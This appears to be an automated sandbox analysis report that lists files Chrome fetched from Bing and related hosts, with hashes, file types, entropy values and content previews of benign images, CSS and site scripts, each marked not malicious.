                                                                                                      SSDEEP:96:ssb41dk9JozAQ8d2SuBK76KrZDoDBtnFKiDo8TzNnNJSHvLPS:sj1eozAQ8d2VPGoBBFfM4fJSHDPS
                                                                                                      MD5:7AEF4CCF6E47B9BA038365CD3D1F5693
                                                                                                      SHA1:71F7957F6FAE574854A374E84DB2E3CEDBA89969
                                                                                                      SHA-256:08102BA7A0388B1AFC9A351B3387B2DDEDA846551303170E0273B2F305AECCB2
                                                                                                      SHA-512:29AC1E6BADF62C61B4FA889EA1B0436D3B9107A60BA03801DFA8E23A4D8BCCF42C09BB7CC7E6CD9FACB8D140DB7E0D4F0EEB3D7D8A3B9B38B1D2B95113005320
                                                                                                      Malicious:false
                                                                                                      Preview:......JFIF.....H.H......Exif..II*...............J...........R...(...........1.......Z...2.......f.......H.......H.......GIMP 2.10.8.2019:07:31 17:51:08....C...........................#.%$"."!&+7/&)4)!"0A149;>>>%.DIC<H7=>;...C...........;("(;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;...........................................................................................VQJ,..R...)..(..R..d.Y@...h..%(.AW(T.)...5.,.%.2[.."*!l...Z......@I..T.......@3.@....D@ ..l.)E.P....ts......@... E".W/G...........IQ..I|../.,..W..(....WY.1<.t..=....K...C....-.1..s.[l...^].mO7|..:.kda5....o.=.S.8.;....~e,.......1v..~5.:s'$..u.i..k.7._E25...f6v..Nk.&)....S.r...ovn5...k9k...u.D...f&.......e.+.7......d..7K.R]..f..K..l...r...*.K.b..s29...y;..U.E(.qH....,....QS%..@....'......................... !."1.#$0@.`............R.J..e~...+.J.....y..7#..^....,.....@.3..`.....L...[u.!.../...*;[7.,...a....[._W...B;.....4g+../c..>g...!..U..Q...0...$..F%...u|.2?.V.>.v..2.2.S.c..km)
                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                      File Type:ASCII text, with very long lines (824), with no line terminators
                                                                                                      Category:downloaded
                                                                                                      Size (bytes):824
                                                                                                      Entropy (8bit):4.9031871499321165
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:12:gsDJ9dOk7xQXcTW54Xc6yMcS2WUAPXc/GIu31VkeejPX8Pp:gsDJnfFQXcc4Xc81cuIaVkegPX8Pp
                                                                                                      MD5:6D94F94BFB17721A8DA8B53731EB0601
                                                                                                      SHA1:AE540DB8D146E17CFC3D09D46B31BD16B3308A6D
                                                                                                      SHA-256:21829C74FCE2C9BBBB3099A7A487DE71465ED712410C32BC6C69884DB07A90DD
                                                                                                      SHA-512:BF33FB4858B56F888108BCD5C2691613B68715E260E59C1E37A050A709BE04A8E0EAF5509667183A0D51F1201E58C02DF4F744A0772242EE5B61595C44C072E7
                                                                                                      Malicious:false
                                                                                                      URL:https://r.bing.com/rp/rlQNuNFG4Xz8PQnUazG9FrMwim0.css
                                                                                                      Preview:#rewardsPanelContainer{position:fixed;top:0;right:0;width:376px;height:100vh;z-index:1100;box-shadow:0 0 0 1px #0000000d,0 0 0 2px #0000001a}#rewardsPanelContainer.darkMode{background:#11100f;color:#edebe9}#rewardsPanelContainer.b_hide{display:none}#rewardsPanelContainer #panelFlyout{width:102%;height:100%;border:none}#rewardsPanelContainer #panelHeader{background:#fff;padding:15px;display:none;text-align:center;justify-content:space-between;border-bottom:1px solid #ccc}#rewardsPanelContainer #panelHeader .title{font-weight:500;font-size:20px;line-height:22px;display:flex;align-items:center}#rewardsPanelContainer #closeRewardsPanel{position:absolute;right:15px;width:12px;height:12px;padding:8px;top:13px}#rewardsPanelContainer #closeRewardsPanel:hover,#rewardsPanelContainer #closeRewardsPanel:focus{cursor:pointer}
                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                      File Type:ASCII text, with very long lines (1970), with no line terminators
                                                                                                      Category:downloaded
                                                                                                      Size (bytes):1970
                                                                                                      Entropy (8bit):5.219240035957165
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:2Qqp/+qmkfREMfC1j7gYu47eTGXaso1pOS3N/AzMCLYtaeA1YIV15ML9YYUAdArz:ap9fCMftAACMafzARzLAxtTF4SqzN4
                                                                                                      MD5:8898A2F705976D9BE01F35A493F9A98F
                                                                                                      SHA1:BC69BEC33A98575D55FEFAE8883C8BB636061007
                                                                                                      SHA-256:5F30270AA2DC8A094D790E1E4A62B17C7D76A20B449D9B69AF797A55FADA9108
                                                                                                      SHA-512:C8575DF93FBD1F65A285D484257ADFE12733E47A6524A18D5910D33562EEFD1D9DA7197D16C7A3CAD3BC5AD89546FF0FEFE90E5C96E7850ECEC9708C90334349
                                                                                                      Malicious:false
                                                                                                      URL:https://r.bing.com/rp/vGm-wzqYV11V_vroiDyLtjYGEAc.js
                                                                                                      Preview:(function(){function a(){r&&(r=!1,w(),SydFSCHelper.deleteNotebookFlagInURL())}function p(){if(!Lib.CssClass.contains(n,"disabled")&&!r){r=!0;var t=_ge(o),i=_ge(s),u=_ge(h);b(t,i);e||v(t,i,u)}}function w(){n&&Lib.CssClass.remove(n,i);t&&Lib.CssClass.remove(t,f);n.firstChild.ariaCurrent="false"}function b(r,u){n&&Lib.CssClass.add(n,i);t&&Lib.CssClass.add(t,f);r&&Lib.CssClass.remove(r,i);u&&Lib.CssClass.remove(u,i);u.firstChild.ariaCurrent="false";n.firstChild.ariaCurrent="page"}function v(i,r,u){var l,s,h,c;if(!e&&n){var a=n.offsetWidth,v=getComputedStyle(n),o=parseInt(v.marginLeft),f;i&&i.offsetWidth&&(l=getComputedStyle(i),o+=i.offsetWidth+parseInt(l.marginRight),f=i);r&&r.offsetWidth&&(s=getComputedStyle(r),o+=(!f?0:parseInt(s.marginLeft))+r.offsetWidth+parseInt(s.marginRight),f||(f=r));u&&u.offsetWidth&&(h=getComputedStyle(u),o+=parseInt(h.marginLeft)+u.offsetWidth+parseInt(h.marginRight));c=sj_ce("style");c.textContent="\n .b_sydConvMode.b_notebookMode .b_scopebar #".conca
                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                      File Type:PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced
                                                                                                      Category:dropped
                                                                                                      Size (bytes):616
                                                                                                      Entropy (8bit):7.431744986765121
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:12:6v/7iQ/GqTbNNfx577z3+H6vaoqaCe7Ng/O/YSe+hiRhDfCGfZWQbHEp:xYNfx977+H6vWaDJgW/Y5+hiRU4dEp
                                                                                                      MD5:63343141C64682BD3E0F711730475354
                                                                                                      SHA1:A2A7298E8F58A74292885BAE9A3F44C76C7AA945
                                                                                                      SHA-256:F90E661A7731C97E3478027D07AFD8C86E461C5F379932E15EFAD17D0E96D402
                                                                                                      SHA-512:17F7F14B0C929164283D5FD7BC829D907B923BB12A7B9D6124A6AAC64EB79AAA47163583ACCA91FC71047BB7BB707D649407801C8762D8942A44531DA9559EDF
                                                                                                      Malicious:false
                                                                                                      Preview:.PNG........IHDR... ... .....szz.....sRGB.........gAMA......a.....IDATXG.W.u.0.d.F`.........oF............;.v...8......$.eE1.eY.0...\.;.T@.9.. ..Hv...Z...UN.i$.|.Z...s....4"...b.^..t6..(. ..*...1..r3v.._o....\.. .0.(D...6.g....+.1.......',.?...G..o.%..D.=w.n........".F..]..~n.UM.....f..^.g.._oE'.9:.s.-...t... Q.....z..I....!.'..Q....{...50....j1.p..|..)..V..?.U..b....A.An..9$...S|W"XZ..'`.h...B../.d....{..$p..PL7....\....D..v..F..A.......S"..Q.....W...(..M(..|.6.^.........T.....2...c9.`|...(....%...RJ.==....lnU1})M..v....l.A.>..U........$....kf.`VcD.c.-.Q..x...-1.....^.?zV.r.|......IEND.B`.
                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                      File Type:SVG Scalable Vector Graphics image
                                                                                                      Category:downloaded
                                                                                                      Size (bytes):671
                                                                                                      Entropy (8bit):5.014579690661168
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:12:tbH4/KYf3UnlcWYl7qy/gk63xsV8tGXcqecDDWUV8jEPsycd23Wt+MKsAnueOc+d:t74LfEnTYpq+gTxs6GUUQEPssmYsAnuH
                                                                                                      MD5:D9ED1A42342F37695571419070F8E818
                                                                                                      SHA1:7DD559538B6D6F0F0D0D19BA1F7239056DFFBC2A
                                                                                                      SHA-256:0C1E2169110DD2B16F43A9BC2621B78CC55423D769B0716EDAA24F95E8C2E9FE
                                                                                                      SHA-512:67F0BC641D78D5C12671FDD418D541F70517C3CA72C7B4682E7CAC80ABE6730A60D7C3C9778095AAB02C1BA43C8DD4038F48A1A17DA6A5E6C5189B30CA19A115
                                                                                                      Malicious:false
                                                                                                      URL:https://r.bing.com/rp/fdVZU4ttbw8NDRm6H3I5BW3_vCo.svg
                                                                                                      Preview:<svg focusable="false" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" x="0px" y="0px"... viewBox="0 0 16 16" enable-background="new 0 0 16 16" xml:space="preserve">..<path fill="#919191" d="M15.707,0.293c-0.391-0.391-1.024-0.391-1.415,0L7.994,6.591L1.696,0.293C1.298-0.091,0.665-0.08,0.281,0.318...c-0.375,0.388-0.375,1.003,0,1.391l6.298,6.298l-6.298,6.298c-0.384,0.398-0.373,1.031,0.025,1.415c0.388,0.375,1.003,0.375,1.391,0...l6.298-6.298l6.298,6.298c0.398,0.384,1.031,0.373,1.415-0.025c0.375-0.388,0.375-1.003,0-1.39L9.409,8.006l6.298-6.298...C16.098,1.317,16.098,0.684,15.707,0.293z"/>..<path fill="none" d="M0,0h16v16H0V0z"/>..</svg>..
                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                      File Type:ASCII text, with very long lines (924), with no line terminators
                                                                                                      Category:downloaded
                                                                                                      Size (bytes):924
                                                                                                      Entropy (8bit):5.195012633286773
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:rVnoyfEzPHQFvG99rynERM93YGxSN+/sKE3p5vyNAM:rVnoyCkKgnCM9eBKE55vyj
                                                                                                      MD5:47442E8D5838BAAA640A856F98E40DC6
                                                                                                      SHA1:54C60CAD77926723975B92D09FE79D7BEFF58D99
                                                                                                      SHA-256:15ED1579BCCF1571A7D8B888226E9FE455ACA5628684419D1A18F7CDA68AF89E
                                                                                                      SHA-512:87C849283248BAF779FAAB7BDE1077A39274DA88BEA3A6F8E1513CB8DCD24A8C465BF431AEE9D655B4E4802E62564D020F0BB1271FB331074D2EC62FC8D08F63
                                                                                                      Malicious:false
                                                                                                      URL:https://r.bing.com/rp/VMYMrXeSZyOXW5LQn-ede-_1jZk.js
                                                                                                      Preview:var __spreadArray=this&&this.__spreadArray||function(n,t,i){if(i||arguments.length===2)for(var r=0,f=t.length,u;r<f;r++)!u&&r in t||(u||(u=Array.prototype.slice.call(t,0,r)),u[r]=t[r]);return n.concat(u||Array.prototype.slice.call(t))};(function(){function n(n){for(var r=[],i=1;i<arguments.length;i++)r[i-1]=arguments[i]}function u(n,t){for(var u=[],r=2;r<arguments.length;r++)u[r-2]=arguments[r];typeof Log!="undefined"&&Log&&Log.Log&&Log.Log.apply(Log,__spreadArray([i,n,t,!1],u,!1))}var t="acclink",i="acclink";if(sj_evt){sj_evt.bind("acclink:updated",function(t){if(t&&t.length>=2){var i=t[1],f=i.IsTenantAllowAccountLink,e=i.HasLinkedAccount;n("fire loadIdLinkIcon with acclink:updated ",t[1]);r(f,e);u("loadIdLinkIcon","load IdLinkIcon","params",t[1])}},1);function r(t,i){var r=_ge("id_linkicon");r&&(t&&i?(r.style.display="inline-block",n("show id link icon")):(r.style.display="none",n("hide id link icon")))}}})()
                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                      Category:dropped
                                                                                                      Size (bytes):242
                                                                                                      Entropy (8bit):4.86807996961474
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:6:A909cpDUDUBDhR9c2p83QVhXANO09c8k9Au9c2pHn:AocpwDUBhfc2W3YXANvcpiMc2Bn
                                                                                                      MD5:6C2C6DB3832D53062D303CDFF5E2BD30
                                                                                                      SHA1:B7A064A64CEAE5C9009EF7D6D8F63B90D3933C9D
                                                                                                      SHA-256:06B77EE16A2CD34ACD210B4F2B6E423762EA8874BB26AE5A37DB9DD01A00FF70
                                                                                                      SHA-512:BC2D115B53035B700D727AF9D7EFAF32DD2A39A2344F3F5FA1A82586BE849EC7803E8320661E66AB7DD2A17E64B7897E95BBD84502B91997FA46EBA4E67E8C7D
                                                                                                      Malicious:false
                                                                                                      Preview:function RewardsReportActivity(n){window.sj_rra&&sj_rra(n)}(function(){RewardsReportActivity(document.URL);sj_evt&&sj_evt.bind("acclink:updated",function(){typeof RewardsReportActivity!="undefined"&&RewardsReportActivity(document.URL)},1)})()
                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                      File Type:ASCII text, with very long lines (827), with no line terminators
                                                                                                      Category:downloaded
                                                                                                      Size (bytes):827
                                                                                                      Entropy (8bit):5.195501381279603
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:2Qou8GFu7Qb/P1CM/8/8Tpn8TpcnnIm4aPfm/yyscY/h:ks7fEEymImzu/yysp/h
                                                                                                      MD5:4D718CDD3E0B924B1C2045F57BD07C19
                                                                                                      SHA1:9901424CDD1A9B6B636BCE9215580125070FE3C1
                                                                                                      SHA-256:F76E92F2C3092AB1AD1A0AA8C6ECB431388ACEC658DEAD15DABEA4326A8248CC
                                                                                                      SHA-512:22FB05CF0C242B32EF301582042FB171A0675C1864DCECCE8A3B4FDADB0B741A119C3890D19E292E64C144E7F584A790E077CD7D5800180294F7544584BC4E3F
                                                                                                      Malicious:false
                                                                                                      URL:https://r.bing.com/rp/mQFCTN0am2tja86SFVgBJQcP48E.js
                                                                                                      Preview:(function(){var n,t,i=(n=_w._sydPayWallConfig)===null||n===void 0?void 0:n.loadSydneyConvResWithPayWall,r=(t=_w._sydPayWallConfig)===null||t===void 0?void 0:t.useSydneyPayWall;sj_evt.bind("rewready",function(n){if(n&&n.length>=2){var t=n[1].waitlist;t&&t=="2"&&i&&(typeof SydFSCHelper!="undefined"&&SydFSCHelper.setSydFSCEligibleState?SydFSCHelper.setSydFSCEligibleState(!0):typeof SydneyFSCDecouple!="undefined"&&SydneyFSCDecouple.setSydFSCEligibleState&&SydneyFSCDecouple.setSydFSCEligibleState(!0),sj_evt.fire("waitlistUpdate:eligible"))}},!0);r?i?sj_evt.bind("onP1",function(){typeof SydFSCHelper!="undefined"&&SydFSCHelper.isSydFSCEligible?sj_evt.fire("sydFSCLoaded"):sj_evt.fire("sydFSCPaywallLoaded")},!0,100):sj_evt.fire("sydFSCPaywallLoaded"):sj_evt.bind("convInit:done",function(){sj_evt.fire("sydFSCLoaded")},!0)})()
                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                      File Type:ASCII text, with very long lines (1274), with no line terminators
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1274
                                                                                                      Entropy (8bit):5.30620342636407
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:+Fq4YTsQF61KWllWeM2lSoiLKiUfpIYdk+fzWPn8X0kdo6QBUf4JPwk:+FGF6UYXEBi9k5P8OPUY
                                                                                                      MD5:A969230A51DBA5AB5ADF5877BCC28CFA
                                                                                                      SHA1:7C4CDC6B86CA3B8A51BA585594EA1AB7B78B8265
                                                                                                      SHA-256:8E572950CBDA0558F7B9563CE4F5017E06BC9C262CF487E33927A948F8D78F7F
                                                                                                      SHA-512:F45B08818A54C5FD54712C28EB2AC3417EEA971C653049108E8809D078F6DD0560C873CEB09C8816ECD08112A007C13D850E2791F62C01D68518B3C3D0ACCCEB
                                                                                                      Malicious:false
                                                                                                      Preview:var Identity=Identity||{};(function(n,t,i,r,u,f,e){e.wlProfile=function(){var r=sj_cook.get,u="WLS",t=r(u,"N"),i=r(u,"C");return i&&e.wlImgSm&&e.wlImgLg?{displayName:t?t.replace(/\+/g," "):"",name:n(t.replace(/\+/g," ")),img:e.wlImgSm.replace(/\{0\}/g,f(i)),imgL:e.wlImgLg.replace(/\{0\}/g,f(i)),idp:"WL"}:null};e.headerLoginMode=0;e.popupAuthenticate=function(n,i,r){var o,u,h,c,v=sb_gt(),l=Math.floor(v/1e3).toString(),s="ct",a=new RegExp("([?&])"+s+"=.*?(&|$)","i");return n.toString()==="WindowsLiveId"&&(o=e.popupLoginUrls,u=o[n],u=u.match(a)?u.replace(a,"$1"+s+"="+l+"$2"):u+"?"+s+"="+l,e.popupLoginUrls.WindowsLiveId=u),(o=e.popupLoginUrls)&&(u=o[n]+(i?"&perms="+f(i):"")+(r?"&src="+f(r):""))&&(h=e.pop(u))&&(c=setInterval(function(){h.closed&&(t.fire("id:popup:close"),clearInterval(c))},100))};e.pop=function(n){return r.open(n,"idl","location=no,menubar=no,resizable=no,scrollbars=yes,status=no,titlebar=no,toolbar=no,width=1000,height=620")};var s=u("id_h"),o=u("id_l"),h="click";t.bind("o
                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                      File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text
                                                                                                      Category:downloaded
                                                                                                      Size (bytes):248
                                                                                                      Entropy (8bit):5.260972651859194
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:6:JiMVBdgqZjzew5WDMER31GicV3B8TgRIMr6Wg6n:MMHdVBSgWDNNYbQ6
                                                                                                      MD5:D25633B492841390EA30800BF75917DD
                                                                                                      SHA1:7F27CBC8D5415770726669EC2577862C4A73CBE0
                                                                                                      SHA-256:9C9F1CEA2E105ABB3CE957EB128A649D43A7D7BDA1DDD81EEB261AC9F2FEAECD
                                                                                                      SHA-512:9DF041A5F3EFE273CC1AB37D1C7194907E930A714E18A34084D50F03CF8542EDB2B44A5F70C7E26E8171512B43C41FA1CCC7602D41F692D089C30A43B32866D1
                                                                                                      Malicious:false
                                                                                                      URL:https://3pcookiecheck.azureedge.net/instrument/cookieenabled
                                                                                                      Preview:.<?xml version="1.0" encoding="utf-8"?><Error><Code>PublicAccessNotPermitted</Code><Message>Public access is not permitted on this storage account..RequestId:c12ba97e-701e-0008-30e6-2a6bd2000000.Time:2024-10-30T16:13:49.3471987Z</Message></Error>
                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                      File Type:ASCII text, with very long lines (622), with no line terminators
                                                                                                      Category:dropped
                                                                                                      Size (bytes):622
                                                                                                      Entropy (8bit):5.265947581512117
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:12:2QxhNgpOWEaaRHkj6iLUEkFKgsmqRRV6alt0Tk6iLUEkFkno:2QTepraRHk+i1kFKgsmqRRVZr8k6i1kh
                                                                                                      MD5:3104955279E1BBBDB4AE5A0E077C5A74
                                                                                                      SHA1:BA10A722FFF1877C3379DEE7B5F028D467FFD6CF
                                                                                                      SHA-256:A0A1CEE602080757FBADB2D23EAD2BBB8B0726B82FDB2ED654DA4403F1E78EF1
                                                                                                      SHA-512:6937ED6194E4842FF5B4878B0D680E02CAF3185BAF65EDC131260B56A87968B5D6C80F236C1DE1A059D8158BC93B80B831FE679F38FC06DFB7C3413D1D5355AA
                                                                                                      Malicious:false
                                                                                                      Preview:(function(){function n(){var n=_ge("id_p"),t,r,i;n&&(t="",r="",n.dataset?(t=n.dataset.src,r=n.dataset.alt):(t=n.getAttribute("data-src"),r=n.getAttribute("data-alt")),t&&t!=""&&(n.onerror=function(){n.onerror=null;n.src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAQAAAC1HAwCAAAAC0lEQVR42mNgYAAAAAMAASsJTYQAAAAASUVORK5CYII=";n.alt=""},n.onload=function(){n.alt=r},n.src=t,i=_d.getElementById("bp_shortcut_img"),i&&(i.setAttribute("src",t),i.onerror=function(){i.setAttribute("src","data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAQAAAC1HAwCAAAAC0lEQVR42mNgYAAAAAMAASsJTYQAAAAASUVORK5CYII=")})))}n()})()
                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                      File Type:ASCII text, with very long lines (7179)
                                                                                                      Category:downloaded
                                                                                                      Size (bytes):7180
                                                                                                      Entropy (8bit):5.161749091368312
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:192:HA1SI+LtL5XIr10Tjyf8J+Bz9NgR51fuPKZs7f/:g1SIiXhqabao6/
                                                                                                      MD5:8E28DB3A65522AE2012DE9ADCE4DE5BF
                                                                                                      SHA1:84EA63544DA64A2355256B0BAE973AE1EAE04CE6
                                                                                                      SHA-256:ADF7F9B0DD938575C72FF1592EA18E7AB9BC53FF8838A38C8484C10F5D9BE7FD
                                                                                                      SHA-512:4319C5B3C4B880ADE6E25B28609A14152389CC8D835AD213D58984153C3E7FF8718B2829A330A7EA4F2C11DB68C358438563FB301D9D6240BF833CEE1462756C
                                                                                                      Malicious:false
                                                                                                      URL:https://r.bing.com/rp/hOpjVE2mSiNVJWsLrpc64ergTOY.js
                                                                                                      Preview:var webVitals=function(e){"use strict";var n,t,r,i,o,a=-1,c=function(e){addEventListener("pageshow",(function(n){n.persisted&&(a=n.timeStamp,e(n))}),!0)},u=function(){var e=self.performance&&performance.getEntriesByType&&performance.getEntriesByType("navigation")[0];if(e&&e.responseStart>0&&e.responseStart<performance.now())return e},s=function(){var e=u();return e&&e.activationStart||0},f=function(e,n){var t=u(),r="navigate";a>=0?r="back-forward-cache":t&&(document.prerendering||s()>0?r="prerender":document.wasDiscarded?r="restore":t.type&&(r=t.type.replace(/_/g,"-")));return{name:e,value:void 0===n?-1:n,rating:"good",delta:0,entries:[],id:"v4-".concat(Date.now(),"-").concat(Math.floor(8999999999999*Math.random())+1e12),navigationType:r}},d=function(e,n,t){try{if(PerformanceObserver.supportedEntryTypes.includes(e)){var r=new PerformanceObserver((function(e){Promise.resolve().then((function(){n(e.getEntries())}))}));return r.observe(Object.assign({type:e,buffered:!0},t||{})),r}}catch(e
                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                      File Type:ASCII text, with very long lines (574), with no line terminators
                                                                                                      Category:downloaded
                                                                                                      Size (bytes):574
                                                                                                      Entropy (8bit):5.105436700660883
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:12:2QpKAbAremR8akHqmm7X+JJ0hHbNkpCfwLCv3PvR3g14M5GK0DsDEtdi:2Q5LqfaJJ0h5kpmkSnR3g1XQAEdi
                                                                                                      MD5:072D0F8C7FDB7655402FB9C592D66E18
                                                                                                      SHA1:2E013E24EF2443215C6B184E9DFE180B7E562848
                                                                                                      SHA-256:4CD4CC3D07BBACDECB7331BF78FC5353B4B2664B6C81C1C0237136123D8E704A
                                                                                                      SHA-512:44CECEE114212D2901DD13F9200771C708EF6E89B9BDCB75EDF898A1E39833AAFA4C7F8EBFC2F613D46EEEA35222A1DFEE3671A1B42679A94BEAEC099164F009
                                                                                                      Malicious:false
                                                                                                      URL:https://r.bing.com/rp/LgE-JO8kQyFcaxhOnf4YC35WKEg.js
                                                                                                      Preview:(function(){function r(i,r){if(typeof Lib!="undefined"&&typeof Lib.CssClass!="undefined"&&n){var u=!Lib.CssClass.contains(n,r);i?Lib.CssClass.remove(n,r):(Lib.CssClass.add(n,r),sj_evt.fire("fab_hide"));u!=i&&r==t&&_w.sj_log&&sj_log("CI.Fab","display",i?"show":"hide")}}function i(n){var u=n[0],i=n[1];r(i,t)}function u(){if(n=_ge("mfa_root"),n)if(fab_config&&fab_config.micFabAlwaysVisible){var u=_ge("mfa_vsrch");u?(sj_evt.bind("vs_fab_vis_feature",i,!0),r(!0,t)):sj_evt.bind("fab_vis",i,!0)}else sj_evt.bind("fab_vis",i,!0)}var t="b_fabHide",n;sj_evt.bind("onP1",u,!0)})()
                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                      File Type:PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced
                                                                                                      Category:downloaded
                                                                                                      Size (bytes):616
                                                                                                      Entropy (8bit):7.431744986765121
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:12:6v/7iQ/GqTbNNfx577z3+H6vaoqaCe7Ng/O/YSe+hiRhDfCGfZWQbHEp:xYNfx977+H6vWaDJgW/Y5+hiRU4dEp
                                                                                                      MD5:63343141C64682BD3E0F711730475354
                                                                                                      SHA1:A2A7298E8F58A74292885BAE9A3F44C76C7AA945
                                                                                                      SHA-256:F90E661A7731C97E3478027D07AFD8C86E461C5F379932E15EFAD17D0E96D402
                                                                                                      SHA-512:17F7F14B0C929164283D5FD7BC829D907B923BB12A7B9D6124A6AAC64EB79AAA47163583ACCA91FC71047BB7BB707D649407801C8762D8942A44531DA9559EDF
                                                                                                      Malicious:false
                                                                                                      URL:https://th.bing.com/th?id=ODLS.A2450BEC-5595-40BA-9F13-D9EC6AB74B9F&w=32&h=32&qlt=93&pcl=fffffa&o=6&pid=1.2
                                                                                                      Preview:.PNG........IHDR... ... .....szz.....sRGB.........gAMA......a.....IDATXG.W.u.0.d.F`.........oF............;.v...8......$.eE1.eY.0...\.;.T@.9.. ..Hv...Z...UN.i$.|.Z...s....4"...b.^..t6..(. ..*...1..r3v.._o....\.. .0.(D...6.g....+.1.......',.?...G..o.%..D.=w.n........".F..]..~n.UM.....f..^.g.._oE'.9:.s.-...t... Q.....z..I....!.'..Q....{...50....j1.p..|..)..V..?.U..b....A.An..9$...S|W"XZ..'`.h...B../.d....{..$p..PL7....\....D..v..F..A.......S"..Q.....W...(..M(..|.6.^.........T.....2...c9.`|...(....%...RJ.==....lnU1})M..v....l.A.>..U........$....kf.`VcD.c.-.Q..x...-1.....^.?zV.r.|......IEND.B`.
                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                      File Type:ASCII text, with very long lines (3363), with no line terminators
                                                                                                      Category:downloaded
                                                                                                      Size (bytes):3363
                                                                                                      Entropy (8bit):5.195022922251816
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:48:rVnoyUQXHE2ugs6SI7kVsP1mB88bTg7IYeYU5qnjRXpHNXhgkGq:Z+yhCPFy12dbTQ3k5GjZjr
                                                                                                      MD5:FABB77C7AE3FD2271F5909155FB490E5
                                                                                                      SHA1:CDE0B1304B558B6DE7503D559C92014644736F88
                                                                                                      SHA-256:E482BF4BAAA167335F326B9B4F4B83E806CC21FB428B988A4932C806D918771C
                                                                                                      SHA-512:CABB38F7961AB11449A6E895657D39C947D422F0B3E1DA976494C53203E0E91ADFC514B6100E632939C4335C119165D2330512CAA7D836A6C863087775EDAA9F
                                                                                                      Malicious:false
                                                                                                      URL:https://r.bing.com/rp/zeCxMEtVi23nUD1VnJIBRkRzb4g.js
                                                                                                      Preview:var __spreadArray=this&&this.__spreadArray||function(n,t,i){if(i||arguments.length===2)for(var r=0,f=t.length,u;r<f;r++)!u&&r in t||(u||(u=Array.prototype.slice.call(t,0,r)),u[r]=t[r]);return n.concat(u||Array.prototype.slice.call(t))},AccountLink;(function(n){function h(n,t){var i=a(n.accLinkRefreshEndPointUrl),r={url:i,requestType:"GET",onSuccess:t.onSuccess,onError:t.onError};v(r)}function s(n){var t=c(n);h(n,t)}function c(n){return{onSuccess:function(n){var e=sb_gt(),o=Math.floor(e/1e3)*1e3,f;sj_cook.set(r,u,o.toString(),!0,"/");t("Refresh Account Link info Success");i("onRefreshAccountLinkInfoResponse","success");f={IsTenantAllowAccountLink:n.IsTenantAllowAccountLink,HasLinkedAccount:n.HasLinkedAccount};n.AccountLinkUpdated&&(t("fire acclink:updated"),sj_evt.fire("acclink:updated",f));n.HasLinkedAccount&&n.IsTenantAllowAccountLink&&i("onRefreshAccountLinkInfoResponse","hasActiveLinkedAccount")},onError:function(f,e,o){var s=sb_gt(),h=Math.floor(s/1e3)*1e3,c=h-(n.refreshAccountLink
                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                      File Type:Unicode text, UTF-8 text, with very long lines (1587), with no line terminators
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1589
                                                                                                      Entropy (8bit):5.24528911504239
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:48:KyskFELbJnSYVtXpQyL93NzpGaQJWA6vrIhf7:KybibJnSE5aU93HGaQJWAiIh
                                                                                                      MD5:CB027BA6EB6DD3F033C02183B9423995
                                                                                                      SHA1:368E7121931587D29D988E1B8CB0FDA785E5D18B
                                                                                                      SHA-256:04A007926A68BB33E36202EB27F53882AF7FD009C1EC3AD7177FBA380A5FB96F
                                                                                                      SHA-512:6A575205C83B1FC3BFAC164828FBDB3A25EAD355A6071B7D443C0F8AB5796FE2601C48946C2E4C9915E08AD14106B4A01D2FCD534D50EA51C4BC88879D8BEC8D
                                                                                                      Malicious:false
